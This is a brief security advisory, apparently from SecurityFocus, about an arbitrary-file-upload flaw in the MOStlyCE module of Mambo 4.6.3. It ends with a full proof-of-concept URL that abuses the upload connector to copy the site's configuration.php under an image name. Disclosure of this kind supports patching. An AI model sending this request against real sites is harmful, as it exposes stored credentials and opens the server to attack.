source: https://www.securityfocus.com/bid/27472/info
The MOStlyCE module for Mambo is prone to an arbitrary-file-upload vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to upload and execute arbitrary script code in the context of the affected webserver process.
MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected.
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=